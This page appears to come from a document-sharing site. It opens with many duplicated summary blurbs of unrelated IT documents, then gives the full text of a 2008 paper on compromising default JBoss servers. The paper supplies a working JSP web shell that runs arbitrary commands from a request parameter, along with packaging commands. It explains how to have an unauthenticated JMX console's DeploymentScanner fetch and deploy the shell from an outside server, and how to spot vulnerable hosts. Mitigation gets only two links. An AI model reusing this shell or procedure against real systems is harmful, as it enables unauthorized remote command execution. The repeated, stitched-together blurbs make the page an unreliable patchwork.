This document describes how to hack a default JBoss installation using the JMX console by deploying a web application that executes system commands. It explains how to create a WAR file with a JSP that allows command execution, deploy it to JBoss by adding the URL to the DeploymentScanner, and then use the application to execute commands with the privileges of the JBoss server. It concludes by providing information on securing the JMX console to prevent this type of attack.
This document provides technical details and recommendations for securing a SLiMS integrated library system implementation. It discusses strategies for separating database access for public and staff users, restricting librarian login by IP address, enabling secure HTTPS connections, removing librarian login links from the public interface, using individual staff accounts, hardening the web server, database and operating system, and using PHP accelerators for performance. Implementation examples are also provided for production environments at government organizations.
ASP.NET 4.0 includes several new features such as output caching extensibility, auto-start web applications, session state compression, routing, and the Chart control. It also includes enhancements to caching, browser capabilities, and project templates. The Dynamic Data feature allows quickly building data-driven websites with automatic validation based on the data model.
This document proposes a technique to prevent XSS attacks by modifying how browsers render <script> tags inserted into the <body> of an HTML document. The technique involves the web server transforming the page generated by the application server by wrapping the <body> contents in a <script> tag. This causes any <script> tags in the original <body> to not execute while preserving those in the <head>. The goal is to enable security without requiring input validation by web developers. A proof-of-concept implementation demonstrates how this modification disables injected malicious scripts.
This document provides an overview and demonstration of the Microsoft Web Platform tools: IIS Web Eco-System, Web Platform Installer (Web PI), and Web Deploy. The presentation covers the main components and features of each tool, how they work, and examples of common usage scenarios. Web PI simplifies installation of web software. Web Deploy enables deployment and synchronization of websites, applications, and databases between IIS servers. Usage scenarios demonstrated include synchronization, migration, packaging, and modifying sync behavior with rules.
The document provides instructions for installing Oracle Enterprise Manager Cloud Control 12c and configuring its components. Key steps include:
1. Installing the Oracle Management Server (OMS) and configuring its database connection and ports.
2. Installing agents on an Oracle SOA clustered domain and configuring auto-discovery and promotion of targets to managed state.
3. Installing the JVMD (JVM Diagnostics) manager to monitor JVMs, which requires resynchronizing agents, selecting the application performance agent, and configuring a managed server.
Windows PowerShell is a new command-line shell and scripting language built on .NET. It can be used to administer SharePoint by allowing execution of multiple commands at once using cmdlets, unlike Stsadm which only accepts one command at a time. Permissions are required to use PowerShell for SharePoint, including being a member of the SharePoint_Shell_Access role and the WSS_ADMIN_WPG local group. Common tasks that can be performed with PowerShell include deploying solutions, managing features, backup/restore of content databases, and other site collection and site management operations.
Making the secure communication between Server and Client with https protocolArmenuhi Abramyan
This document discusses how to configure Apache HTTP Server 2.2.14 to enable secure communication using HTTPS. It describes generating a private key and self-signed certificate for the server, configuring the Apache modules for SSL and rewrite, and testing that web pages under the /b directory are only accessible via HTTPS and redirect HTTP requests to HTTPS.
The document outlines a series of laboratory exercises for configuring and using the Apache web server. It includes instructions for:
1) Setting up virtual machines and configuring networking to host Apache websites.
2) Installing and testing Apache, and familiarizing with its configuration file.
3) Configuring Apache as a secure reverse proxy and implementing basic security restrictions.
4) Adding user authentication, using .htaccess files, and virtual hosting with multiple sites.
5) Securing sites with SSL/TLS using self-signed and real certificates.
This document provides technical details and recommendations for securing a SLiMS integrated library system implementation. It discusses strategies for separating database access for public and staff users, restricting librarian login by IP address, enabling secure HTTPS connections, removing librarian login links from the public interface, using individual staff accounts, hardening the web server, database and operating system, and using PHP accelerators for performance. Implementation examples are also provided for production environments at government organizations.
ASP.NET 4.0 includes several new features such as output caching extensibility, auto-start web applications, session state compression, routing, and the Chart control. It also includes enhancements to caching, browser capabilities, and project templates. The Dynamic Data feature allows quickly building data-driven websites with automatic validation based on the data model.
This document proposes a technique to prevent XSS attacks by modifying how browsers render <script> tags inserted into the <body> of an HTML document. The technique involves the web server transforming the page generated by the application server by wrapping the <body> contents in a <script> tag. This causes any <script> tags in the original <body> to not execute while preserving those in the <head>. The goal is to enable security without requiring input validation by web developers. A proof-of-concept implementation demonstrates how this modification disables injected malicious scripts.
This document provides an overview and demonstration of the Microsoft Web Platform tools: IIS Web Eco-System, Web Platform Installer (Web PI), and Web Deploy. The presentation covers the main components and features of each tool, how they work, and examples of common usage scenarios. Web PI simplifies installation of web software. Web Deploy enables deployment and synchronization of websites, applications, and databases between IIS servers. Usage scenarios demonstrated include synchronization, migration, packaging, and modifying sync behavior with rules.
The document provides instructions for installing Oracle Enterprise Manager Cloud Control 12c and configuring its components. Key steps include:
1. Installing the Oracle Management Server (OMS) and configuring its database connection and ports.
2. Installing agents on an Oracle SOA clustered domain and configuring auto-discovery and promotion of targets to managed state.
3. Installing the JVMD (JVM Diagnostics) manager to monitor JVMs, which requires resynchronizing agents, selecting the application performance agent, and configuring a managed server.
Windows PowerShell is a new command-line shell and scripting language built on .NET. It can be used to administer SharePoint by allowing execution of multiple commands at once using cmdlets, unlike Stsadm which only accepts one command at a time. Permissions are required to use PowerShell for SharePoint, including being a member of the SharePoint_Shell_Access role and the WSS_ADMIN_WPG local group. Common tasks that can be performed with PowerShell include deploying solutions, managing features, backup/restore of content databases, and other site collection and site management operations.
Making the secure communication between Server and Client with https protocolArmenuhi Abramyan
This document discusses how to configure Apache HTTP Server 2.2.14 to enable secure communication using HTTPS. It describes generating a private key and self-signed certificate for the server, configuring the Apache modules for SSL and rewrite, and testing that web pages under the /b directory are only accessible via HTTPS and redirect HTTP requests to HTTPS.
The document outlines a series of laboratory exercises for configuring and using the Apache web server. It includes instructions for:
1) Setting up virtual machines and configuring networking to host Apache websites.
2) Installing and testing Apache, and familiarizing with its configuration file.
3) Configuring Apache as a secure reverse proxy and implementing basic security restrictions.
4) Adding user authentication, using .htaccess files, and virtual hosting with multiple sites.
5) Securing sites with SSL/TLS using self-signed and real certificates.
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
This document provides tips for securing a WordPress website. It lists 27 steps including disabling custom HTML, removing default posts and comments, deleting installation files, hiding indexes, blocking directories, securing the admin page, limiting login attempts, scanning for malware, creating custom secret keys, changing the database prefix, protecting configuration files, monitoring the site, hiding the login page, checking for content copying, scanning for exploits, using email as the login key, keeping logs of errors, activating the Akismet plugin, using maintenance mode, restricting admin access by IP, banning users, preventing access to folders, protecting individual files, disabling hotlinking, stopping spam, and optimizing the database. The document recommends using various WordPress security plugins and provides
Wamp & LAMP - Installation and ConfigurationChetan Soni
This document provides instructions for installing and configuring WAMP (Windows, Apache, MySQL, PHP) and LAMP (Linux, Apache, MySQL, PHP) servers on Windows and Linux respectively. For the WAMP installation, it describes downloading and installing Apache, PHP, MySQL, and configuring them to work together. It then tests the installation with sample PHP files. For the LAMP installation, it describes initial steps like installing gcc and logging in as root before explaining how to install Apache, PHP and MySQL from source code.
This document provides instructions for installing SwiftConfigurator software. It outlines requirements for the operating system, database, application server, and browser. It describes how to configure the Oracle 11g database and Application Server 10g. Steps are provided for deploying the SwiftConfigurator application and configuring datasources. Additional setup information is also included for language settings and known issues.
This document discusses Android storage and Opaque Binary Blobs (OBBs). It defines StorageManager as the interface for storage-related items like OBBs. OBBs allow large binary assets to be stored outside an APK and mounted on demand. The document outlines how to create an encrypted OBB file using mkobb.sh, change its owner, sign it with obbtool, and include it in an OBB-enabled APK to securely provide additional app resources like large files.
This document provides a guide to configuring the Apache web server. It begins with basic setup instructions, covering verifying the installation, editing configuration files, creating HTML documents, starting the server, and accessing the website locally and externally. It then covers more advanced topics like using directory, files, and location tags; redirecting URLs; setting up virtual hosts; loading modules; using .htaccess files; and securing the server with encrypted sessions and SSL/TLS certificates. The document is intended to help new Linux and Windows users become proficient with Apache.
The document discusses configuring JBoss to work behind a firewall by modifying socket-based services that open listening ports. It lists several key JBoss services that open ports by default, including the naming service on port 1098, invoker services on ports 4444 and 4445, and others. It provides the configuration files and attributes to modify ports for each service.
This document is a user manual for an address book application. It provides instructions on installing the application, setting up users and permissions, integrating additional features like synchronization with email/mobile devices, customizing the look and feel, upgrading to new versions, and managing addresses within the system through the web interface, mobile apps, or email. The key sections cover quick or manual installation, configuring user accounts and permissions, integrating with services like Google/Facebook, and accessing and managing address entries.
This document provides instructions for setting up a highly available SharePoint farm in Windows Azure using SQL Server AlwaysOn availability groups. It describes how to configure Azure components like virtual networks and machines, set up an Active Directory domain, install and configure SharePoint and SQL Server, and create an AlwaysOn availability group across multiple SQL Server instances to provide database redundancy. The farm is designed across availability sets and fault domains in Azure to ensure high availability of the SharePoint and SQL resources in the cloud.
( 16 ) Office 2007 Create An Extranet Site With Forms AuthenticationLiquidHub
The document provides instructions for creating an extranet site that uses Forms Authentication in SharePoint. The steps include:
1) Creating an IIS web application and site collection for the extranet site.
2) Modifying the web.config files for the extranet site and Central Administration site to connect to the ASP.NET membership database.
3) Configuring authentication for the extranet site to use Forms Authentication and adding the first administrator user.
Lab 1: Introduction to Amazon EC2 and MPIZubair Nabi
The document introduces Amazon EC2, MPI, and provides an example MPI "Hello World" program. It describes how EC2 allows users to rent virtual machines from a variety of configurations. It also explains basic MPI concepts like point-to-point communication and collective operations for exchanging data between processes.
This document provides instructions for backing up and restoring SMS messages from the GO SMS app using various storage options like local storage, cloud storage, and Dropbox. It also describes how to decrypt common SMS messages, which are stored in an XML file, and private SMS messages, which are stored in the app's SQLite database file. The private messages can be decrypted by running a Python script on the database file or by exporting the data from the database into a CSV file using SQLite browser software.
This webcast covers the theoretical introduction to Web Farms and how to build Drupal Web Farms with IIS. Don't miss the second part of the webcast (also part of this series) where a full demo on creating Drupal Web Farms with 4 virtual machines will be presented. If you are already familiar with Web Farms, Application Request Router, Web Farm Framework you can skip to part 2. Otherwise, this webcast is highly recommended and propaedeutic to grasp all the basic knowledge that you might need later.
AzMan is the authorization manager that controls role-based access in Hyper-V. It uses role definitions and assignments to determine which tasks and operations each user role is allowed to perform. AzMan can be used to securely configure access at the hypervisor or individual VM level. It is configured through the Azman.msc interface by creating roles, tasks, and assigning users and groups to roles. When a Hyper-V host joins a domain or is managed by VMM, AzMan permissions may be overwritten and default to provide full access to domain admins or VMM administrators.
A general performance settings monitoring plugin on the RavenDB database. It uses system commands to obtain the general performance settings for the database. For more information visit the following webpage: http://pandorafms.com/index.php?sec=Library&sec2=repository&lng=es&action=view_PUI&id_PUI=606
ASP.NET websites can be vulnerable to attacks like file inclusion and remote code execution if they do not properly sanitize user-supplied input, as features like Response.WriteFile and Server.Execute could allow an attacker to read arbitrary files or execute code if passed a malicious file path. The ViewState, Request Validation, and Event Validation features also have weaknesses that could allow attacks like cross-site scripting or request forgery if not implemented correctly.
This document discusses copyright and permissions related to the publication. It notes that no part of the publication may be reproduced without permission, except for certain fair use cases allowed under US copyright law. It also states that the information is intended to be accurate but does not provide licensing or guarantees regarding any third party content. Finally, it provides publishing details such as the publisher, date, and graphic artist used.
The document discusses security constraints for the Java EE platform. It provides an example of a security constraint configuration for the Java EE web application deployment descriptor that limits access to the "/admin/" URL pattern only to users with the "admin" role. The example uses the <security-constraint> element of the web deployment descriptor to specify this configuration.
This document summarizes Andrew van der Stock's presentation on Ajax security at the 2006 OWASP AppSec Europe conference. The presentation covered many security issues introduced by Ajax applications, including lack of privacy due to JavaScript being sent in cleartext, session fixation, injection attacks, improper access control, and the need to properly handle errors and audit client-side actions. It emphasized that Ajax applications must use the same authorization and validation techniques as traditional web apps to prevent attacks.
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
This document provides tips for securing a WordPress website. It lists 27 steps including disabling custom HTML, removing default posts and comments, deleting installation files, hiding indexes, blocking directories, securing the admin page, limiting login attempts, scanning for malware, creating custom secret keys, changing the database prefix, protecting configuration files, monitoring the site, hiding the login page, checking for content copying, scanning for exploits, using email as the login key, keeping logs of errors, activating the Akismet plugin, using maintenance mode, restricting admin access by IP, banning users, preventing access to folders, protecting individual files, disabling hotlinking, stopping spam, and optimizing the database. The document recommends using various WordPress security plugins and provides
Wamp & LAMP - Installation and ConfigurationChetan Soni
This document provides instructions for installing and configuring WAMP (Windows, Apache, MySQL, PHP) and LAMP (Linux, Apache, MySQL, PHP) servers on Windows and Linux respectively. For the WAMP installation, it describes downloading and installing Apache, PHP, MySQL, and configuring them to work together. It then tests the installation with sample PHP files. For the LAMP installation, it describes initial steps like installing gcc and logging in as root before explaining how to install Apache, PHP and MySQL from source code.
This document provides instructions for installing SwiftConfigurator software. It outlines requirements for the operating system, database, application server, and browser. It describes how to configure the Oracle 11g database and Application Server 10g. Steps are provided for deploying the SwiftConfigurator application and configuring datasources. Additional setup information is also included for language settings and known issues.
This document discusses Android storage and Opaque Binary Blobs (OBBs). It defines StorageManager as the interface for storage-related items like OBBs. OBBs allow large binary assets to be stored outside an APK and mounted on demand. The document outlines how to create an encrypted OBB file using mkobb.sh, change its owner, sign it with obbtool, and include it in an OBB-enabled APK to securely provide additional app resources like large files.
This document provides a guide to configuring the Apache web server. It begins with basic setup instructions, covering verifying the installation, editing configuration files, creating HTML documents, starting the server, and accessing the website locally and externally. It then covers more advanced topics like using directory, files, and location tags; redirecting URLs; setting up virtual hosts; loading modules; using .htaccess files; and securing the server with encrypted sessions and SSL/TLS certificates. The document is intended to help new Linux and Windows users become proficient with Apache.
The document discusses configuring JBoss to work behind a firewall by modifying socket-based services that open listening ports. It lists several key JBoss services that open ports by default, including the naming service on port 1098, invoker services on ports 4444 and 4445, and others. It provides the configuration files and attributes to modify ports for each service.
This document is a user manual for an address book application. It provides instructions on installing the application, setting up users and permissions, integrating additional features like synchronization with email/mobile devices, customizing the look and feel, upgrading to new versions, and managing addresses within the system through the web interface, mobile apps, or email. The key sections cover quick or manual installation, configuring user accounts and permissions, integrating with services like Google/Facebook, and accessing and managing address entries.
This document provides instructions for setting up a highly available SharePoint farm in Windows Azure using SQL Server AlwaysOn availability groups. It describes how to configure Azure components like virtual networks and machines, set up an Active Directory domain, install and configure SharePoint and SQL Server, and create an AlwaysOn availability group across multiple SQL Server instances to provide database redundancy. The farm is designed across availability sets and fault domains in Azure to ensure high availability of the SharePoint and SQL resources in the cloud.
( 16 ) Office 2007 Create An Extranet Site With Forms AuthenticationLiquidHub
The document provides instructions for creating an extranet site that uses Forms Authentication in SharePoint. The steps include:
1) Creating an IIS web application and site collection for the extranet site.
2) Modifying the web.config files for the extranet site and Central Administration site to connect to the ASP.NET membership database.
3) Configuring authentication for the extranet site to use Forms Authentication and adding the first administrator user.
Lab 1: Introduction to Amazon EC2 and MPIZubair Nabi
The document introduces Amazon EC2, MPI, and provides an example MPI "Hello World" program. It describes how EC2 allows users to rent virtual machines from a variety of configurations. It also explains basic MPI concepts like point-to-point communication and collective operations for exchanging data between processes.
This document provides instructions for backing up and restoring SMS messages from the GO SMS app using various storage options like local storage, cloud storage, and Dropbox. It also describes how to decrypt common SMS messages, which are stored in an XML file, and private SMS messages, which are stored in the app's SQLite database file. The private messages can be decrypted by running a Python script on the database file or by exporting the data from the database into a CSV file using SQLite browser software.
This webcast covers the theoretical introduction to Web Farms and how to build Drupal Web Farms with IIS. Don't miss the second part of the webcast (also part of this series) where a full demo on creating Drupal Web Farms with 4 virtual machines will be presented. If you are already familiar with Web Farms, Application Request Router, Web Farm Framework you can skip to part 2. Otherwise, this webcast is highly recommended and propaedeutic to grasp all the basic knowledge that you might need later.
AzMan is the authorization manager that controls role-based access in Hyper-V. It uses role definitions and assignments to determine which tasks and operations each user role is allowed to perform. AzMan can be used to securely configure access at the hypervisor or individual VM level. It is configured through the Azman.msc interface by creating roles, tasks, and assigning users and groups to roles. When a Hyper-V host joins a domain or is managed by VMM, AzMan permissions may be overwritten and default to provide full access to domain admins or VMM administrators.
A general performance settings monitoring plugin on the RavenDB database. It uses system commands to obtain the general performance settings for the database. For more information visit the following webpage: http://pandorafms.com/index.php?sec=Library&sec2=repository&lng=es&action=view_PUI&id_PUI=606
ASP.NET websites can be vulnerable to attacks like file inclusion and remote code execution if they do not properly sanitize user-supplied input, as features like Response.WriteFile and Server.Execute could allow an attacker to read arbitrary files or execute code if passed a malicious file path. The ViewState, Request Validation, and Event Validation features also have weaknesses that could allow attacks like cross-site scripting or request forgery if not implemented correctly.
This document discusses copyright and permissions related to the publication. It notes that no part of the publication may be reproduced without permission, except for certain fair use cases allowed under US copyright law. It also states that the information is intended to be accurate but does not provide licensing or guarantees regarding any third party content. Finally, it provides publishing details such as the publisher, date, and graphic artist used.
The document discusses security constraints for the Java EE platform. It provides an example of a security constraint configuration for the Java EE web application deployment descriptor that limits access to the "/admin/" URL pattern only to users with the "admin" role. The example uses the <security-constraint> element of the web deployment descriptor to specify this configuration.
This document summarizes Andrew van der Stock's presentation on Ajax security at the 2006 OWASP AppSec Europe conference. The presentation covered many security issues introduced by Ajax applications, including lack of privacy due to JavaScript being sent in cleartext, session fixation, injection attacks, improper access control, and the need to properly handle errors and audit client-side actions. It emphasized that Ajax applications must use the same authorization and validation techniques as traditional web apps to prevent attacks.
This document discusses SQL injection vulnerabilities in web applications. It begins by providing an overview and background on web applications and SQL. It then discusses comprehensively testing applications for SQL injection vulnerabilities and evaluating the results. The main section describes various SQL injection attack techniques, including authorization bypass, SELECT queries, INSERT statements, and exploiting stored procedures. It concludes by offering solutions for preventing SQL injection through data sanitization and secure coding practices.
This document provides guidelines for integrating the CommWeb Virtual Payment Client (VPC) to enable online payment processing. It outlines the VPC API and how to use VPC functionality to perform payment transactions and optional administration functions. The intended audience is merchants and integrators. Key steps for merchants to enable online payments are to obtain an access code and secure hash secret from Commonwealth Bank, then integrate the VPC into their e-commerce application based on the guidance in this manual.
This document discusses security issues with Ajax web applications. It describes how Ajax applications have a larger attack surface than traditional web applications due to additional entry points. This exposes the application to risks like information leakage through revealing internal functions, as well as risks from cross-site scripting and repudiation of requests. The document recommends approaches to secure Ajax applications.
This document contains a list of 109 documents related to credit cards. The documents cover various topics about credit cards including how to use credit cards responsibly, reducing credit card debt, choosing the right credit card type, avoiding credit card fraud, and understanding credit card fees and interest rates.
The document provides an overview of JBoss Application Server, including its definition, architecture, advantages, installation, configuration, deployment, running applications, and undeployment. It discusses that JBoss is a widely used open source Java application server that allows deployment of Java applications and provides services like transaction processing and security. The document also provides details on installing JBoss, using the management console, deploying applications as WAR files using Ant build scripts, and modifying or removing deployed applications.
This document provides instructions for getting started with JBoss ESB, including downloading and installing JBoss ESB, deploying it to the JBoss Application Server or JBoss ESB Server, and running a "Hello World" quickstart example to validate the installation. Key steps include downloading JBoss ESB and either the JBoss Application Server or JBoss ESB Server, configuring deployment properties, deploying JBoss ESB archives using Ant, and running the quickstart to test the integration.
This document provides instructions for getting started with JBoss ESB, including downloading and installing JBoss ESB, deploying it to the JBoss Application Server or JBoss ESB Server, and running a "Hello World" quickstart example to validate the installation. Key steps include downloading JBoss ESB and either the JBoss Application Server or JBoss ESB Server, configuring deployment properties, deploying JBoss ESB archives using Ant, and starting the server.
The slides from my Deployment Tactics talk at the ThinkVitamin Code Management online conference (http://thinkvitamin.com/online-conferences/code-manage-deploy/).
Drupal Continuous Integration with Jenkins - DeployJohn Smith
This document describes setting up Jenkins jobs to automate deploying code from a Git repository to different environments. It includes:
1. Creating a simple job that deploys code to a single server/environment using a deployment script.
2. Creating a generic job that deploys code to multiple servers/environments using parameters for the repository, branch, and environment.
3. A sample deployment script that would run on servers to check out the appropriate code from Git based on the job parameters.
OFM SOA Suite 11gR1 – Installation DemonstrationSreenivasa Setty
Complete step-by-step installation instructions with screen captures to install and configure WebLogic Server and SOA Suite 11g R1.
This document is a fine extract of various installation documents, along with installation planning notes, and post installation verification points.
The document summarizes several key Java EE services including resource management, Java Naming and Directory Service (JNDS), security services, and transaction services. Resource management is implemented using resource pooling and activation/deactivation. Security services provide declarative security using roles and securing both EJBs and web components requires defining a security domain, login/error pages, and security declarations in deployment descriptors. Transactions services allow distributed transactions across multiple resources.
This document provides information on various tools used to develop mobile applications using HTML5, CSS, and JavaScript including Node.js, Git, Bower, PhoneGap, Cordova, ngCordova, and Angular Material Design. It also provides instructions on setting proxies for Node.js, Git, and Bower as well as steps for creating a mobile app with PhoneGap and Cordova.
This document discusses Protractor, an end-to-end testing framework for AngularJS applications. It explains what Protractor is, why it is needed for testing AngularJS apps, and how to install and use it. Key points include: Protractor combines Selenium to test AngularJS apps; it allows testing of app functionality rather than just unit tests; installation involves Node.js, Selenium WebDriver, and setting up a configuration file and spec file to define tests. An example test is provided to demonstrate entering text into a field and validating the output.
PVS-Studio: analyzing pull requests in Azure DevOps using self-hosted agentsAndrey Karpov
Static code analysis is most effective when changing a project, as errors are always more difficult to fix in the future than at an early stage. We continue expanding the options for using PVS-Studio in continuous development systems. This time, we'll show you how to configure pull request analysis using self-hosted agents in Microsoft Azure DevOps, using the example of the Minetest game.
Deploying configurable frontend web application containersJosé Moreira
Deploying containerized client-side web applications requires a different configuration strategy compared to system applications. The runtime of client-side web applications is the client-side web browser and, unlike other applications which can utilize environment values, configuration has to be hard-coded in the Javascript source code.
Setting up the hyperledger composer in ubuntukesavan N B
The document provides steps to set up Hyperledger Composer in Ubuntu by:
1. Installing development tools like composer-cli, generator-hyperledger-composer, and composer-rest-server.
2. Starting Hyperledger Fabric.
3. Creating a business network definition from a sample, modifying files, and defining models and transactions.
4. Building a business network archive (.bna) file.
5. Deploying the .bna file to the running Hyperledger Fabric.
6. Generating a REST API using composer-rest-server to interact with the business network.
Presentation on how Meetup tackles web performance. Given on:
- Nov 17th, 2009 for the NY Web Performance Group (http://www.meetup.com/Web-Performance-NY/)
- Jan 26th, 2010 for NYC Tech Talks Meetup Group (http://www.meetup.com/NYC-Tech-Talks/)
1. Meetup discussed optimizing the performance of their event details page by externalizing scripts, moving scripts to the bottom of the page, reducing requests, lazy loading scripts, and using event delegation.
2. These changes reduced the page load time by 27% from 6.321 seconds to 4.643 seconds and reduced javascript requests by 50%.
3. Meetup also optimized static content serving by versioning, compressing, caching resources and using a CDN to improve performance further.
The document provides an introduction to JBoss Application Server, including its history, architecture, components, installation process, directory structure, and how to start and stop the server. It also discusses the JBoss Administration Console and JMX Console for managing and monitoring the application server.
Prizm Content Connect is a lightweight document viewer flash control that allows applications to display and interact with different file formats like Microsoft Office documents. It provides a universal viewing solution and acts as a document container for embedding documents in a custom form or webpage. The viewer is lightweight, flexible and allows integrating an end-to-end solution using Office or other native format documents in a custom solution.
Story about module management with angular.jsDavid Amend
Angular.js angular some thoughs and learnings about module management. some ideas about usefulness of amd and alternatives up to async loading of content and execution
Speakers:
Johannes Weber
David Amend
Silicon Valley CodeCamp 2008: High performance Ajax with ExtJS and ASP.NETMats Bryntse
This document provides an overview and introduction to using ExtJS with ASP.NET for building high performance AJAX applications. It covers setting up Visual Studio for JavaScript development, debugging techniques, an introduction to ExtJS, examples of ExtJS components like grids and form panels, handling errors, and tips for optimizing AJAX performance.
"Hidden difficulties of debugger implementation for .NET WASM apps", Andrii R...Fwdays
Debug infrastructure implementation for .NET (Blazor) WebAssembly apps is challenging due to its unique execution environment. In this talk, we will dive deep into the hidden difficulties of debugger IDE frontend implementation for .NET WASM apps.
We'll start with an overview of Blazor WASM app execution anatomy, reviewing Debug Proxy in prticular. We will then compare regular .NET debugging with Blazor debugging and introduce Rider Debugging Infrastructure. Next, we'll discuss the steps involved in debug session initialization, including how the CDP (Chrome DevTools Protocol) is used. We will cover breakpoints, evaluation and explore multiple console views orchestration. Finally, we will discuss a few words about hot-reload, how it works and how it is supported from the IDE side.
This talk is essential for .NET developers working with Blazor WASM and anyone interested in understanding the complexities of debugging .NET WASM applications.
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
The document discusses penetration testing of the Easy RM to MP3 Converter application. It begins by setting up the testing environment with Backtrack5, Windows SP2 and SP3 virtual machines, and the vulnerable application. It then analyzes the application dynamically using a debugger to find a buffer overflow vulnerability. The document creates an exploit payload that uses return oriented programming (ROP) to bypass data execution prevention (DEP) and execute shellcode to connect back to the attacker machine for post-exploit access.
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Jboss Exploit
1. Hacking jBoss
Hacking a default jBoss installation using a browser
Jörg Scheinert
joerg.scheinert@nruns.com
IT Security Consultant, n.runs AG
n.runs AG is a vendor-independent consulting company
specializing in the areas of: IT Infrastructure, IT Security
,IT Business Consulting and IT Applications. For
additional information visit the n.runs AG website at
www.nruns.com.
2. Table of Contents
1. Introduction........................................................................................................ 3
2. Jboss................................................................................................................. 3
2.1. Default installation...................................................................................... 3
2.2. JMX Console ............................................................................................. 3
3. Deploy a web application................................................................................... 4
3.1. The web application ................................................................................... 4
3.2. Deploy it..................................................................................................... 5
4. Execute your code (hacker view) ....................................................................... 6
5. Secure the JMX Console (administrator view) ................................................... 6
Page 2 of 6 28.02.2008 n.runs AG
3. 1. Introduction
This paper is a brief how-to on hacking a default Jboss installation using the JMX-Console.
2. Jboss
Jboss is an open source, standards-compliant application server which is based on J2EE
(Java 2 Enterprise Edition). Being a Java-based application, it is generally platform-
independent.
2.1. Default installation
The default configuration of Jboss is relatively open and thereby provides the
administrator – as well as hackers - with many possibilities to compromise it.
2.2. JMX Console
1
The JMX console can be remotely accessed on port 8080 in the default configuration.
The JMX console provides a view into the microkernel of the Jboss application server, as
well as access to the MBeans of the application server. The JMX console can be used to
configure the MBeans of the Jboss server. By default the JMX console on
http://[host]:8080/jmx-console can be accessed without any authentication.
1
http://en.wikipedia.org/wiki/JMX
n.runs AG 28.02.2008 Page 3 of 6
4. 3. Deploy a web application
In order to deploy new applications on the application server, it is only necessary to configure
the DeploymentScanner by adding a new URL with a customized WAR (Web ARchive) file.
2
The DeploymentScanner regularly checks the configured URLs for new applications to
deploy. By default it only checks the URL file:/[JBOSSHOME]/server/default/deploy/, but
with the addURL() command, it is possible to add a new URL with an application. Jboss will
get the application from this URL. The next step is to wait for the DeploymentScanner to run
the next time (usually about one minute), and access the new application.
3.1. The web application
It is necessary to create a WAR file with WEB-INF a JSP to execute system commands.
Here is a short example:
$ echo 'The JSP to execute the commands'
$ cat >cmd.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
$ echo 'The web.xml file in the WEB-INF directory configures the web application'
$ mkdir WEB-INF
$ cat >WEB-INF/web.xml
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>
$ echo 'Now put it into the WAR file'
$ jar cvf cmd.war WEB-INF cmd.jsp
$ echo 'Copy it on a web server where the Jboss server can get it'
$ cp cmd.war /var/www/localhost/htdocs/
2
http://wiki.jboss.org/wiki/Wiki.jsp?page=DeploymentScanner
Page 4 of 6 28.02.2008 n.runs AG
5. More information can be found at:
WAR file: http://en.wikipedia.org/wiki/Sun_WAR_%28file_format%29
Creating a WAR file: http://access1.sun.com/techarticles/simple.WAR.html
JSP: http://en.wikipedia.org/wiki/JavaServer_Pages
3.2. Deploy it
1. Navigate the browser to the jboss.deployment:flavor=URL,type=DeploymentScanner
mbean
(http://[host]:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL)
2. Add the URL of the customized WAR file with the addURL() command
Invoke:
Success:
3. Wait for the DeploymentScanner....
n.runs AG 28.02.2008 Page 5 of 6
6. 4. Access the deployed application
4. Execute your code (hacker view)
What needs to be deployed in order to execute the desired commands on the Jboss server?
To access an application with the browser, a web application should be deployed. For
example put a command.jsp into the WAR file and upload it to the web server. The WAR file
should be deployed, wait for the DeploymentScanner and execute commands using the
command.jsp. These commands will be executed with the privileges of the Jboss server.
4.1. Identifying vulnerable systems
Identifying vulnerable systems is easy, just check for page :
http://[host]:8080/jmx-
console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=Deplo
ymentScanner,flavor=URL
and the string "addURL()".
5. Secure the JMX Console (administrator view)
http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole
http://jira.jboss.com/jira/secure/attachment/12313981/index.html
n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure,
IT Security, IT Business Consulting and IT Applications. Founded in 2001, n.runs specializes in
helping its customers to solve their information technology problems proactively and reactively. n.runs
delivers services in the areas of network design planning and implementation consulting, technical
security consulting such as secure design, application auditing, development of customized security
solutions, information security management consulting and specialized application products. Based in
Oberursel and Berlin, Germany, n.runs offers its knowledge and expertise to clients all over the world.
For additional information visit the n.runs AG website at www.nruns.com.
Page 6 of 6 28.02.2008 n.runs AG